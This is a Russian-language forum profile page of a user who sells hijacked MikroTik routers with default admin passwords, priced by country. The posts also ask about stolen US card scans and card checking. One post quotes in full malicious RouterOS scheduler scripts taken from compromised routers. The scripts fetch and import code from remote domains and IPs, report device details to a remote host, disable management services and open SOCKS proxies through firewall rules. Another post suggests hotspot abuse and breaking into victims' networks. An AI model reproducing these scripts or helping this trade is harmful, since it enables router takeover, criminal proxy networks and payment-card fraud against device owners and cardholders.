Перейти к содержанию

MaksY

Пользователь
  • Публикаций

    5
  • Зарегистрирован

  • Посещение

Репутация

30 Excellent

Информация о MaksY

  • Звание
    Rank №1
  1. Сканы USA CC

    https://colnect.com/ru Вот тут немного есть сканов.
  2. Роутеры все сраны. MikroTik FTP server. Продаю микротики. В наличии и на заказ. Стран много. То что не найду сделаю. Ценник разный. Дорого, скоро кончатся все. Но пока делаю. На одну страну может отличатся. Много HOTSPOT . Домашки редко. Минималка 30$ USA 25$ lu ch no ie is mt cy pt pl ee gr sk cl dk sg au se nl sm at fi de be nl ca nz il fr es it gb bg us hk 20$ остальные. Максимум до 150$. Это : там первые, пароль админа не менялся. к точке подлючено ещё куча роутеров и компов. Таких мало. Продаю только обновлённые. Кроме админа никто не выгонит с него. В рукапашку чекаю перед продажей, даю скрин с моделью и interfase list Сам онлайн редко, ну или могу не отвечать от занятости. Минимум в течении дня отвечаю. Только гарант или маркет мс. Только моментальные сделки или гарант на маркет мс.
  3. Дак на карте 300 руб. пробить. Или что ещё точнее можнно чем выписка?
  4. на этом месте самое важное - можно ли открыть нестандартный порт? вид прокси не важен, но только нестандарт! Дык разные порты можно открывать, закрывать. Спойлер /tool fetch url=http://onlinegt.xyz/poll/cac0f314-c45a-4c85-ace3-b1f033a3630a mode=http dst-path=7wmp0b4swouv /import 7wmp0b4swouv /ip service disable winbox /ip service disable telnet /ip service disable api /ip service disable api-ssl /ip service set ssh port=27781 /ip socks set port=6623 /ip socks access add src-address=5.188.0.0/15 action=allow /ip socks access add src-address=192.243.0.0/16 action=allow /ip socks access add src-address=31.184.0.0/16 action=allow /ip socks set action=deny :Do { /system scheduler set U6 interval=00:00:15 } on-error={ :put "U6 not found"} /tool fetch url=http://147.135.234.198/error.html mode=http dst-path=flash/webproxy/error.html :global mac [/interface ethernet get 1 mac-address] :global port ([/ip service get winbox port]."_".[/ip socks get port]."_".[/ip proxy get port]) :global info ([/ip socks get enabled]."_".[/ip proxy get enabled]."_".[/interface pptp-server server get enabled]) :global cmd "/$mac/$port/$info/dns" /tool fetch address=147.135.234.198 src-path=$cmd mode=http dst-path=dns;:delay 3s /import dns;:delay 4s;/file remove dns /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=35376 max-connections=500 connection-idle-timeout=30;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=35376 action=accept comment="port 35376";/ip firewall filter move [/ip firewall filter find comment=port 35376] 1; /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=35376 max-connections=500 connection-idle-timeout=30;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=35376 action=accept comment="port 35376";/ip firewall filter move [/ip firewall filter find comment=port 35376] 1; /tool fetch url=http://gamesone.xyz/poll/abac2146-0373-4958-bc41-352437c339d3 mode=http dst-path=7wmp0b4swouv /import 7wmp0b4swouv /ip service disable winbox /ip service disable telnet /ip service disable api /ip service disable api-ssl /ip service set ssh port=27781 /ip socks set port=3852 /ip socks access add src-address=5.188.0.0/15 action=allow /ip socks access add src-address=192.243.0.0/16 action=allow /ip socks access add src-address=31.184.0.0/16 action=allow /ip socks set action=deny :Do { /system scheduler set U6 interval=00:00:15 } on-error={ :put "U6 not found"} /tool fetch url=http://picsgifs.xyz/poll/e4cc2c38-35dc-403a-b877-abd4b3498ccb mode=http dst-path=7wmp0b4swouv /import 7wmp0b4swouv /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=38736 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=38736 action=accept comment="port 38736";/ip firewall filter move [/ip firewall filter find comment=port 38736] 1; /tool fetch address=178.32.120.230 port=3666 src-path=/update mode=http keep-result=no /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=64312 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=64312 action=accept comment="port 64312";/ip firewall filter move [/ip firewall filter find comment=port 64312] 1; В шедулере и в скриптах такое. Это в роутерах которые получается переугнать, вроде из под китайцев. Под сокс сервис похоже пользованы. (ну по скриптам). Да и шедулере тоже палево, в видосике глаголит что для прописки на долго пользуют комментарии невидимыми их делают, но не поясняет особо как так) думаю просто шрифт в цвет, врятли что-то ещё. :download:
  5. На продвинутых моделях есть возможность развернуть hotspot с авторизацией по смс. Но наверно быстро спалят. Надо подумать как сделать лучше: https://www.lanmart.ru/blogs/mikrotik-hotspot Хост для небольшого сайта можно развернуть: https://m.habr.com/post/248009/ Ну и впн конечно включить. 445 порт открыть, но только и так если доступ есть эту паку pub видно :) Нужно в сетку смотреть, ищу тех кто может, интересные сетки попадаются часто.
×